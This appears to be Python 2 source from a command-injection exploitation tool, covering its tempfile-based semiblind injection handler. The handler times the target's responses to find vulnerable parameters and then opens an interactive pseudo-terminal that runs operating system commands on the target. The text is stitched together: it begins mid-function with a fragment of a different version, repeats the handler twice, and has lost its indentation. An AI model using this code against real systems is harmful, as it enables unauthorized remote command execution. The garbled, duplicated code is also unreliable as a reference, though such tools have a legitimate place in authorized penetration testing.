sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay) :
if len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check for any enumeration options.
tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check if defined single cmd.
if menu.options.os_cmd:
tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print colors.BGRED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + colors.RESET
i = 0
# Calculate all possible combinations
total = len(settings.SEPARATORS)
#Estimating the response time (in seconds)
sys.stdout.write("(*) The estimated response time is ")
sys.stdout.flush()
opener = urllib.FancyURLopener({})
start = time.time()
f = opener.open(url)
end = time.time()
diff = end - start
url_time_response = int(diff)
print str(url_time_response) + " second" + "s"[url_time_response ==
1:] + "."
delay = int(delay) + int(url_time_response)
for separator in settings.SEPARATORS:
i = i + 1
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + B64_ENC_TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for j in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell:
payload = tfb_payloads.decision_alter_shell(
separator, j, TAG, OUTPUT_TEXTFILE, delay,
http_request_method)
else:
payload = tfb_payloads.decision(separator, j, TAG,
OUTPUT_TEXTFILE, delay,
http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
sys.stdout.write("\n" + colors.GREY + payload +
colors.RESET)
# Check if target host is vulnerable
how_long, vuln_parameter = tfb_injector.injection_test(
payload, http_request_method, url)
if not menu.options.verbose:
percent = ((i * 100) / total)
if how_long == delay:
percent = colors.GREEN + "SUCCEED" + colors.RESET
elif percent == 100:
if no_result == True:
percent = colors.RED + "FAILED" + colors.RESET
else:
percent = str(percent) + "%"
else:
percent = str(percent) + "%"
sys.stdout.write(colors.BOLD + "\r(*) Testing the " +
technique + "... " + colors.RESET + "[ " +
percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
if not menu.options.verbose:
percent = ((i * 100) / total)
if percent == 100:
if no_result == True:
percent = colors.RED + "FAILED" + colors.RESET
else:
percent = str(percent) + "%"
else:
percent = str(percent) + "%"
sys.stdout.write(colors.BOLD + "\r(*) Testing the " +
technique + "... " + colors.RESET + "[ " +
percent + " ]")
sys.stdout.flush()
continue
# Yaw, got shellz!
# Do some magic tricks!
if how_long == delay:
found = True
no_result = False
if http_request_method == "GET":
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Parameter : " +
vuln_parameter + " (" +
http_request_method + ")")
output_file.write("\n---\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt", "a")
output_file.write(" (" + str(counter) + ") Payload : " +
re.sub("%20", " ", payload) + "\n")
output_file.close()
#Vulnerabe Parameter
GET_vuln_param = parameters.vuln_GET_param(url)
# Print the findings to terminal.
print colors.BOLD + "\n(!) The (" + http_request_method + ") '" + colors.UNDERL + GET_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to " + injection_type + "." + colors.RESET
print " (+) Type : " + colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
print " (+) Technique : " + colors.YELLOW + colors.BOLD + technique.title(
) + colors.RESET + ""
print " (+) Payload : " + colors.YELLOW + colors.BOLD + re.sub(
"%20", " ",
urllib.unquote_plus(payload)) + colors.RESET
else:
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Parameter : " +
vuln_parameter + " (" +
http_request_method + ")")
output_file.write("\n---\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt", "a")
output_file.write(" (" + str(counter) + ") Payload : " +
re.sub("%20", " ", payload) + "\n")
output_file.close()
#Vulnerabe Parameter
POST_vuln_param = vuln_parameter
# Print the findings to terminal.
print colors.BOLD + "\n(!) The (" + http_request_method + ") '" + colors.UNDERL + POST_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to " + injection_type + "." + colors.RESET
print " (+) Type : " + colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
print " (+) Technique : " + colors.YELLOW + colors.BOLD + technique.title(
) + colors.RESET + ""
print " (+) Payload : " + colors.YELLOW + colors.BOLD + re.sub(
"%20", " ", payload) + colors.RESET
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, delay,
http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE,
alter_shell)
# Pseudo-Terminal shell
gotshell = raw_input(
"\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > "
).lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
sys.exit(0)
else:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(
separator, maxlen, TAG, cmd, delay,
http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
print "\n\n" + colors.GREEN + colors.BOLD + output + colors.RESET
print "\n(*) Finished in " + time.strftime(
'%H:%M:%S',
time.gmtime(check_how_long)) + ".\n"
except KeyboardInterrupt:
print ""
sys.exit(0)
else:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the " +
technique + "... ")
sys.stdout.flush()
pass
if no_result == True:
if menu.options.verbose == False:
print ""
return False
else:
print ""
return False
else:
if menu.options.verbose == True:
print ""
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url,delay,filename,tmp_path,http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded= False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print colors.BGRED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET
i = 0
# Calculate all possible combinations
total = len(settings.SEPARATORS)
#Estimating the response time (in seconds)
sys.stdout.write("(*) The estimated response time is ")
sys.stdout.flush()
opener = urllib.FancyURLopener({})
start = time.time()
f = opener.open(url)
end = time.time()
diff = end - start
url_time_response = int(diff)
print str(url_time_response) + " second" + "s"[url_time_response == 1:] + "."
delay = int(delay) + int(url_time_response)
for separator in settings.SEPARATORS:
i = i + 1
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + B64_ENC_TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for j in range(1,int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator,j,TAG,OUTPUT_TEXTFILE,delay,http_request_method)
else:
payload = tfb_payloads.decision(separator,j,TAG,OUTPUT_TEXTFILE,delay,http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
# Check if target host is vulnerable
how_long,vuln_parameter = tfb_injector.injection_test(payload,http_request_method,url)
if not menu.options.verbose:
percent = ((i*100)/total)
if how_long == delay:
percent = colors.GREEN + "SUCCEED" + colors.RESET
elif percent == 100:
if no_result == True:
percent = colors.RED + "FAILED" + colors.RESET
else:
percent = str(percent)+"%"
else:
percent = str(percent)+"%"
sys.stdout.write(colors.BOLD + "\r(*) Testing the "+ technique + "... " + colors.RESET + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
if not menu.options.verbose:
percent = ((i*100)/total)
if percent == 100:
if no_result == True:
percent = colors.RED + "FAILED" + colors.RESET
else:
percent = str(percent)+"%"
else:
percent = str(percent)+"%"
sys.stdout.write(colors.BOLD + "\r(*) Testing the "+ technique + "... " + colors.RESET + "[ " + percent + " ]")
sys.stdout.flush()
continue
# Yaw, got shellz!
# Do some magic tricks!
if how_long == delay:
found = True
no_result = False
if http_request_method == "GET":
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
output_file.write("\n---\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt", "a")
output_file.write(" ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
output_file.close()
#Vulnerabe Parameter
GET_vuln_param = parameters.vuln_GET_param(url)
# Print the findings to terminal.
print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + colors.UNDERL + GET_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
print " (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
print " (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
print " (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20", " ", urllib.unquote_plus(payload)) + colors.RESET
else :
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
output_file.write("\n---\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt", "a")
output_file.write(" ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
output_file.close()
#Vulnerabe Parameter
POST_vuln_param = vuln_parameter
# Print the findings to terminal.
print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + colors.UNDERL + POST_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
print " (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
print " (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
print " (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20", " ", payload) + colors.RESET
# Check for any enumeration options.
tfb_enumeration.do_check(separator,maxlen,TAG,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell)
# Pseudo-Terminal shell
gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
sys.exit(0)
else:
# The main command injection exploitation.
check_how_long,output = tfb_injector.injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell)
if menu.options.verbose:
print ""
print "\n\n" + colors.GREEN + colors.BOLD + output + colors.RESET
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
except KeyboardInterrupt:
print ""
sys.exit(0)
else:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
pass
if no_result == True:
if menu.options.verbose == False:
print ""
return False
else:
print ""
return False
else :
if menu.options.verbose == True:
print ""
sys.stdout.write("\r")
sys.stdout.flush()
